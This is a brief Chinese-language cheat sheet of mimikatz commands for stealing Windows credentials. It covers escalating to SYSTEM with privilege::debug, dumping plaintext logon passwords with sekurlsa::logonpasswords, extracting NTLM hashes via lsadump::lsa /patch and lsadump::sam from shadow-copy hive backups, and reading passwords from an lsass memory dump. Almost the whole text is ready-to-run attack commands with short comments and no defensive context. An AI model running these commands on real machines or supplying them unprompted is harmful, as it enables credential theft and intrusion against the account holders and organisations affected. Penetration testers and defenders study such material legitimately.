mimikatz使用时需要高权限,至少是administrator权限
mimikatz抓取密码的命令需要system权限,可以先进行提权
privilege::debug //提升权限(从administrator提升到system)
抓取hash
sekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行)
lsadump::lsa /patch //获取当前此计算机存在过用户的NTLMHASH
mimikatz的其他命令
lsadump::sam SYSTEM.hiv //导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份
通过内存文件获取口令
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full